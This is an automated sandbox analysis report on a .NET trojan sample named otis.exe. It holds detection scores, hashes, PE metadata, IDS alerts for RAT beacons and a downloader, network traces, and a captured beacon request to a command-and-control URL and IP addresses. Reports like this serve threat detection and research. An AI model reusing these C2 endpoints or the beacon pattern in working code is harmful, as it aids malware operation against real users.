behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1554908 Sample: otis.exe Startdate: 13/11/2024 Architecture: WINDOWS Score: 64 27 federalrevenueboard.com 2->27 29 241.42.69.40.in-addr.arpa 2->29 35 Suricata IDS alerts for network traffic 2->35 37 Multi AV Scanner detection for submitted file 2->37 39 Uses known network protocols on non-standard ports 2->39 41 AI detected suspicious sample 2->41 8 otis.exe 14 2 2->8         started        signatures3 process4 dnsIp5 31 162.252.175.131, 55174, 55443, 55445 HVC-ASUS United States 8->31 33 federalrevenueboard.com 91.132.92.231, 49736, 55442, 55444 ALEXHOSTMD Moldova Republic of 8->33 11 cmd.exe 1 8->11         started        13 cmd.exe 8->13         started        15 cmd.exe 8->15         started        17 cmd.exe 8->17         started        process6 process7 19 conhost.exe 11->19         started        21 conhost.exe 13->21         started        23 conhost.exe 15->23         started        25 conhost.exe 17->25         started       

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
otis.exe42%ReversingLabsByteCode-MSIL.Trojan.Zilla
otis.exe52%VirustotalBrowse
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
federalrevenueboard.com1%VirustotalBrowse
SourceDetectionScannerLabelLink
http://federalrevenueboard.com:93142y0%Avira URL Cloudsafe
http://federalrevenueboard.com0%Avira URL Cloudsafe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5P0%Avira URL Cloudsafe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.50%Avira URL Cloudsafe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5h0%Avira URL Cloudsafe
http://federalrevenueboard.com:93140%Avira URL Cloudsafe
http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.52%VirustotalBrowse
NameIPActiveMaliciousAntivirus DetectionReputation
federalrevenueboard.com
91.132.92.231
truefalseunknown
241.42.69.40.in-addr.arpa
unknown
unknownfalse
    high
    NameMaliciousAntivirus DetectionReputation
    http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5false
    • 2%, Virustotal, Browse
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5Potis.exe, 00000000.00000002.3495540101.0000027247A71000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://federalrevenueboard.com:93142yotis.exe, 00000000.00000002.3495540101.0000027247AFD000.00000004.00000800.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameotis.exe, 00000000.00000002.3495540101.0000027247AFD000.00000004.00000800.00020000.00000000.sdmpfalse
      high
      http://federalrevenueboard.comotis.exe, 00000000.00000002.3495540101.0000027247BC5000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.3495540101.0000027247B1F000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://federalrevenueboard.com:9314/hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5hotis.exe, 00000000.00000002.3495540101.0000027247BC5000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.3495540101.0000027247B74000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      http://federalrevenueboard.com:9314otis.exe, 00000000.00000002.3495540101.0000027247AFD000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.3495540101.0000027247BC5000.00000004.00000800.00020000.00000000.sdmp, otis.exe, 00000000.00000002.3495540101.0000027247B74000.00000004.00000800.00020000.00000000.sdmpfalse
      • Avira URL Cloud: safe
      unknown
      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs
      IPDomainCountryFlagASNASN NameMalicious
      91.132.92.231
      federalrevenueboard.comMoldova Republic of
      200019ALEXHOSTMDfalse
      162.252.175.131
      unknownUnited States
      29802HVC-ASUStrue
      Joe Sandbox version:41.0.0 Charoite
      Analysis ID:1554908
      Start date and time:2024-11-13 08:10:56 +01:00
      Joe Sandbox product:CloudBasic
      Overall analysis duration:0h 5m 8s
      Hypervisor based Inspection enabled:false
      Report type:full
      Cookbook file name:default.jbs
      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
      Run name:Run with higher sleep bypass
      Number of analysed new started processes analysed:13
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Sample name:otis.exe
      Detection:MAL
      Classification:mal64.troj.winEXE@13/0@3/2
      EGA Information:
      • Successful, ratio: 100%
      HCA Information:
      • Successful, ratio: 97%
      • Number of executed functions: 4
      • Number of non-executed functions: 0
      Cookbook Comments:
      • Found application associated with file extension: .exe
      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
      • Not all processes where analyzed, report is missing behavior information
      • Report size getting too big, too many NtQueryValueKey calls found.
      • Report size getting too big, too many NtReadVirtualMemory calls found.
      No simulations
      No context
      No context
      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
      ALEXHOSTMDarmv5l.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 91.208.162.247
      mips.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 91.208.162.247
      m68k.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 91.208.162.247
      powerpc.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 91.208.162.247
      armv6l.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 91.208.162.247
      sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 91.208.162.247
      x86.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 91.208.162.247
      mips.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 91.208.162.247
      sh4.elfGet hashmaliciousGafgyt, MiraiBrowse
      • 91.208.162.247
      HVC-ASUSbotnet.x86.elfGet hashmaliciousMirai, MoobotBrowse
      • 199.193.112.254
      cIs9D0juC8.exeGet hashmaliciousRemcos, GuLoaderBrowse
      • 23.227.202.197
      KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
      • 151.236.16.15
      KC0uZWwr8p.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
      • 151.236.16.15
      Payload 94.75 (3).225.exeGet hashmaliciousUnknownBrowse
      • 104.254.128.202
      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
      • 151.236.16.15
      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
      • 151.236.16.15
      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
      • 151.236.16.15
      CiscoSetup.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
      • 151.236.16.15
      Advanced_IP_Scanner_2.5.4594.12.exeGet hashmaliciousNetSupport RAT, NetSupport DownloaderBrowse
      • 151.236.16.15
      No context
      No context
      No created / dropped files found
      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
      Entropy (8bit):5.501218592626246
      TrID:
      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
      • Win32 Executable (generic) a (10002005/4) 49.78%
      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
      • Generic Win/DOS Executable (2004/3) 0.01%
      • DOS Executable Generic (2002/1) 0.01%
      File name:otis.exe
      File size:22'016 bytes
      MD5:3d922c89c5f0f8f9a738bec3a24d0494
      SHA1:d5b0ad895d5adbf919ed6771292410df924fdd00
      SHA256:cb7e6640ab5c1dad5083e5790d6009c317894406b970d42a34758e99a9ff7f94
      SHA512:500f43580fd4e19cbf0c833cd44a2e92cf307ed8055a48a185da40e814cabc37204f83070da372220c8866a0c24a72b4ebae6714c8426c5d2c5d504d6c1b4d28
      SSDEEP:384:XQq1xmsrEE/FL36Rvz+MXPM0jJ/ALE4ziUtVEEAcdx+xrlCWJr:X8CEKF36RvzRJCEMgyDERCWJr
      TLSH:19A22A4DA3ACCA3BEB5F1BBD64B2436287B1D255A117FBAA8EC8F6D43C07340044456B
      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....X..........."...0..N...........l... ........@.. ....................................`................................
      Icon Hash:90cececece8e8eb0
      Entrypoint:0x406c9e
      Entrypoint Section:.text
      Digitally signed:false
      Imagebase:0x400000
      Subsystem:windows gui
      Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Time Stamp:0xB658ECE9 [Sat Dec 11 08:18:49 2066 UTC]
      TLS Callbacks:
      CLR (.Net) Version:
      OS Version Major:4
      OS Version Minor:0
      File Version Major:4
      File Version Minor:0
      Subsystem Version Major:4
      Subsystem Version Minor:0
      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
      Instruction
      jmp dword ptr [00402000h]
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      add byte ptr [eax], al
      NameVirtual AddressVirtual Size Is in Section
      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IMPORT0x6c4c0x4f.text
      IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x298.rsrc
      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
      IMAGE_DIRECTORY_ENTRY_DEBUG0x6c300x1c.text
      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
      .text0x20000x4ca40x4e00b7462f6534755f556cdb5f1a5d657d13False0.5072115384615384data5.766776919396873IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      .rsrc0x80000x2980x4003de4c7942443a7a75c7669f30cfda13bFalse0.2939453125data2.1007893131205564IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
      .reloc0xa0000xc0x200d48209f22d80462bc43cac6ca4f50c10False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
      NameRVASizeTypeLanguageCountryZLIB Complexity
      RT_VERSION0x80580x23cdata0.46853146853146854
      DLLImport
      mscoree.dll_CorExeMain
      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
      2024-11-13T08:12:05.952078+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow1172.202.163.200443192.168.2.449730TCP
      2024-11-13T08:12:24.170628+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.455174162.252.175.1316969TCP
      2024-11-13T08:12:26.366708+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.455175TCP
      2024-11-13T08:12:27.632430+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.455176TCP
      2024-11-13T08:13:57.604442+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.45544291.132.92.2319314TCP
      2024-11-13T08:14:02.666863+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.455443162.252.175.1316969TCP
      2024-11-13T08:14:20.129952+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.45544491.132.92.2319314TCP
      2024-11-13T08:14:25.197740+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.455445162.252.175.1316969TCP
      2024-11-13T08:14:42.862830+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.45544691.132.92.2319314TCP
      2024-11-13T08:14:48.185402+01002811176ETPRO MALWARE Luminosity Link RAT CnC Beacon Outbound1192.168.2.455447162.252.175.1316969TCP
      2024-11-13T08:14:51.480932+01002803305ETPRO MALWARE Common Downloader Header Pattern H3192.168.2.45544891.132.92.2319314TCP
      TimestampSource PortDest PortSource IPDest IP
      Nov 13, 2024 08:12:17.025930882 CET497369314192.168.2.491.132.92.231
      Nov 13, 2024 08:12:17.030880928 CET93144973691.132.92.231192.168.2.4
      Nov 13, 2024 08:12:17.030982971 CET497369314192.168.2.491.132.92.231
      Nov 13, 2024 08:12:17.033828974 CET497369314192.168.2.491.132.92.231
      Nov 13, 2024 08:12:17.038661003 CET93144973691.132.92.231192.168.2.4
      Nov 13, 2024 08:12:18.458340883 CET93144973691.132.92.231192.168.2.4
      Nov 13, 2024 08:12:18.458357096 CET93144973691.132.92.231192.168.2.4
      Nov 13, 2024 08:12:18.458369017 CET93144973691.132.92.231192.168.2.4
      Nov 13, 2024 08:12:18.458381891 CET93144973691.132.92.231192.168.2.4
      Nov 13, 2024 08:12:18.458393097 CET93144973691.132.92.231192.168.2.4
      Nov 13, 2024 08:12:18.458528042 CET497369314192.168.2.491.132.92.231
      Nov 13, 2024 08:12:18.458528042 CET497369314192.168.2.491.132.92.231
      Nov 13, 2024 08:12:18.458528042 CET497369314192.168.2.491.132.92.231
      Nov 13, 2024 08:12:18.463356018 CET93144973691.132.92.231192.168.2.4
      Nov 13, 2024 08:12:18.464353085 CET497369314192.168.2.491.132.92.231
      Nov 13, 2024 08:12:18.467075109 CET497369314192.168.2.491.132.92.231
      Nov 13, 2024 08:12:18.471865892 CET93144973691.132.92.231192.168.2.4
      Nov 13, 2024 08:12:23.705342054 CET551746969192.168.2.4162.252.175.131
      Nov 13, 2024 08:12:23.710164070 CET696955174162.252.175.131192.168.2.4
      Nov 13, 2024 08:12:23.710270882 CET551746969192.168.2.4162.252.175.131
      Nov 13, 2024 08:12:24.011531115 CET551746969192.168.2.4162.252.175.131
      Nov 13, 2024 08:12:24.016608953 CET696955174162.252.175.131192.168.2.4
      Nov 13, 2024 08:12:24.165787935 CET551746969192.168.2.4162.252.175.131
      Nov 13, 2024 08:12:24.170576096 CET696955174162.252.175.131192.168.2.4
      Nov 13, 2024 08:12:24.170628071 CET551746969192.168.2.4162.252.175.131
      Nov 13, 2024 08:12:24.175409079 CET696955174162.252.175.131192.168.2.4
      Nov 13, 2024 08:12:32.190819979 CET696955174162.252.175.131192.168.2.4
      Nov 13, 2024 08:12:32.190891981 CET551746969192.168.2.4162.252.175.131
      Nov 13, 2024 08:12:32.201518059 CET551746969192.168.2.4162.252.175.131
      Nov 13, 2024 08:12:32.206506014 CET696955174162.252.175.131192.168.2.4
      Nov 13, 2024 08:13:56.657628059 CET554429314192.168.2.491.132.92.231
      Nov 13, 2024 08:13:56.662616014 CET93145544291.132.92.231192.168.2.4
      Nov 13, 2024 08:13:56.662714005 CET554429314192.168.2.491.132.92.231
      Nov 13, 2024 08:13:56.663345098 CET554429314192.168.2.491.132.92.231
      Nov 13, 2024 08:13:56.668097973 CET93145544291.132.92.231192.168.2.4
      Nov 13, 2024 08:13:57.594269037 CET93145544291.132.92.231192.168.2.4
      Nov 13, 2024 08:13:57.604377985 CET93145544291.132.92.231192.168.2.4
      Nov 13, 2024 08:13:57.604441881 CET554429314192.168.2.491.132.92.231
      Nov 13, 2024 08:13:57.604516029 CET554429314192.168.2.491.132.92.231
      Nov 13, 2024 08:13:57.610905886 CET93145544291.132.92.231192.168.2.4
      Nov 13, 2024 08:13:57.610960960 CET554429314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:02.605257034 CET554436969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:02.610137939 CET696955443162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:02.610284090 CET554436969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:02.620372057 CET554436969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:02.625171900 CET696955443162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:02.661859989 CET554436969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:02.666769981 CET696955443162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:02.666862965 CET554436969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:02.671727896 CET696955443162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:11.085159063 CET696955443162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:11.085216999 CET554436969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:11.086256027 CET554436969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:11.090964079 CET696955443162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:11.699034929 CET554449314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:11.704742908 CET93145544491.132.92.231192.168.2.4
      Nov 13, 2024 08:14:11.704826117 CET554449314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:11.705224991 CET554449314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:11.710963011 CET93145544491.132.92.231192.168.2.4
      Nov 13, 2024 08:14:20.120095015 CET93145544491.132.92.231192.168.2.4
      Nov 13, 2024 08:14:20.129882097 CET93145544491.132.92.231192.168.2.4
      Nov 13, 2024 08:14:20.129951954 CET554449314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:20.130027056 CET554449314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:20.143076897 CET93145544491.132.92.231192.168.2.4
      Nov 13, 2024 08:14:20.143237114 CET554449314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:25.130860090 CET554456969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:25.136512995 CET696955445162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:25.136605024 CET554456969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:25.152195930 CET554456969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:25.157114983 CET696955445162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:25.192640066 CET554456969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:25.197622061 CET696955445162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:25.197740078 CET554456969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:25.202564955 CET696955445162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:33.617146015 CET696955445162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:33.617451906 CET554456969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:33.619461060 CET554456969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:33.624322891 CET696955445162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:41.938206911 CET554469314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:41.943497896 CET93145544691.132.92.231192.168.2.4
      Nov 13, 2024 08:14:41.943574905 CET554469314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:41.943820000 CET554469314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:41.949909925 CET93145544691.132.92.231192.168.2.4
      Nov 13, 2024 08:14:42.851872921 CET93145544691.132.92.231192.168.2.4
      Nov 13, 2024 08:14:42.862024069 CET93145544691.132.92.231192.168.2.4
      Nov 13, 2024 08:14:42.862829924 CET554469314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:42.862894058 CET554469314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:42.868079901 CET93145544691.132.92.231192.168.2.4
      Nov 13, 2024 08:14:42.870870113 CET554469314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:47.863365889 CET554476969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:48.126458883 CET696955447162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:48.126607895 CET554476969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:48.142194033 CET554476969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:48.147257090 CET696955447162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:48.180499077 CET554476969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:48.185350895 CET696955447162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:48.185401917 CET554476969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:48.190141916 CET696955447162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:49.207182884 CET696955447162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:49.207278967 CET554476969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:49.208121061 CET554476969192.168.2.4162.252.175.131
      Nov 13, 2024 08:14:49.212944984 CET696955447162.252.175.131192.168.2.4
      Nov 13, 2024 08:14:50.557652950 CET554489314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:50.562602997 CET93145544891.132.92.231192.168.2.4
      Nov 13, 2024 08:14:50.562683105 CET554489314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:50.562774897 CET554489314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:50.567555904 CET93145544891.132.92.231192.168.2.4
      Nov 13, 2024 08:14:51.470612049 CET93145544891.132.92.231192.168.2.4
      Nov 13, 2024 08:14:51.480881929 CET93145544891.132.92.231192.168.2.4
      Nov 13, 2024 08:14:51.480931997 CET554489314192.168.2.491.132.92.231
      Nov 13, 2024 08:14:51.599122047 CET93145544891.132.92.231192.168.2.4
      Nov 13, 2024 08:14:51.599919081 CET554489314192.168.2.491.132.92.231
      TimestampSource PortDest PortSource IPDest IP
      Nov 13, 2024 08:12:16.715662003 CET5676053192.168.2.41.1.1.1
      Nov 13, 2024 08:12:17.013284922 CET53567601.1.1.1192.168.2.4
      Nov 13, 2024 08:12:21.098664045 CET5363997162.159.36.2192.168.2.4
      Nov 13, 2024 08:12:21.886758089 CET5628253192.168.2.41.1.1.1
      Nov 13, 2024 08:12:21.893949032 CET53562821.1.1.1192.168.2.4
      Nov 13, 2024 08:14:41.747096062 CET6203053192.168.2.41.1.1.1
      Nov 13, 2024 08:14:41.937100887 CET53620301.1.1.1192.168.2.4
      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
      Nov 13, 2024 08:12:16.715662003 CET192.168.2.41.1.1.10xb89Standard query (0)federalrevenueboard.comA (IP address)IN (0x0001)false
      Nov 13, 2024 08:12:21.886758089 CET192.168.2.41.1.1.10x8fe2Standard query (0)241.42.69.40.in-addr.arpaPTR (Pointer record)IN (0x0001)false
      Nov 13, 2024 08:14:41.747096062 CET192.168.2.41.1.1.10x69edStandard query (0)federalrevenueboard.comA (IP address)IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Nov 13, 2024 08:12:17.013284922 CET1.1.1.1192.168.2.40xb89No error (0)federalrevenueboard.com91.132.92.231A (IP address)IN (0x0001)false
      Nov 13, 2024 08:12:21.893949032 CET1.1.1.1192.168.2.40x8fe2Name error (3)241.42.69.40.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
      Nov 13, 2024 08:14:41.937100887 CET1.1.1.1192.168.2.40x69edNo error (0)federalrevenueboard.com91.132.92.231A (IP address)IN (0x0001)false
      • federalrevenueboard.com:9314
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.44973691.132.92.23193146840C:\Users\user\Desktop\otis.exe
      TimestampBytes transferredDirectionData
      Nov 13, 2024 08:12:17.033828974 CET127OUTGET /hera/initiation?whoisit=smyytbFVD4&lookup=6.3.2.5 HTTP/1.1
      Host: federalrevenueboard.com:9314
      Connection: Keep-Alive
      Nov 13, 2024 08:12:18.458340883 CET199INHTTP/1.1 200 OK
      Server: Werkzeug/3.0.4 Python/3.10.12
      Date: Wed, 13 Nov 2024 07:12:17 GMT
      Content-Type: application/json
      Content-Length: 359
      Access-Control-Allow-Origin: *
      Connection: close
      Nov 13, 2024 08:12:18.458393097 CET558INHTTP/1.1 200 OK
      Server: Werkzeug/3.0.4 Python/3.10.12
      Date: Wed, 13 Nov 2024 07:12:17 GMT
      Content-Type: application/json
      Content-Length: 359
      Access-Control-Allow-Origin: *
      Connection: close
      Data Raw: 7b 0a 20 20 22 52 65 71 75 65 73 74 49 64 22 3a 20 22 4d 54 59 79 4c 6a 49 31 4d 69 34 78 4e 7a 55 75 4d 54 4d 78 4f 6a 59 35 4e 6a 6b 3d 22 2c 0a 20 20 22 61 73 22 3a 20 22 22 2c 0a 20 20 22 63 69 74 79 22 3a 20 22 53 69 65 72 72 61 20 56 69 73 74 61 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 22 3a 20 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 0a 20 20 22 63 6f 75 6e 74 72 79 43 6f 64 65 22 3a 20 22 55 53 22 2c 0a 20 20 22 69 73 70 22 3a 20 22 43 4f 4e 55 53 2d 59 50 47 22 2c 0a 20 20 22 6c 61 74 22 3a 20 33 31 2e 35 35 35 32 2c 0a 20 20 22 6c 6f 6e 22 3a 20 2d 31 31 30 2e 33 35 2c 0a 20 20 22 6f 72 67 22 3a 20 22 55 53 41 49 53 43 22 2c 0a 20 20 22 71 75 65 72 79 22 3a 20 22 36 2e 33 2e 32 2e 35 22 2c 0a 20 20 22 72 65 67 69 6f 6e 22 3a 20 22 41 5a 22 2c 0a 20 20 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 20 22 41 72 69 7a 6f 6e 61 22 2c 0a 20 20 22 73 74 61 74 75 73 22 3a 20 22 73 75 63 63 65 73 73 22 2c 0a 20 20 22 74 69 6d 65 7a 6f 6e 65 22 3a 20 22 41 6d 65 72 69 63 61 2f 50 68 6f 65 6e 69 78 22 [TRUNCATED]
      Data Ascii: { "RequestId": "MTYyLjI1Mi4xNzUuMTMxOjY5Njk=", "as": "", "city": "Sierra Vista", "country": "United States", "countryCode": "US", "isp": "CONUS-YPG", "lat": 31.5552, "lon": -110.35, "org": "USAISC", "query": "6.3.2.5", "region": "AZ", "regionName": "Arizona", "status": "success", "timezone": "America/Phoenix", "zip": "85613"}


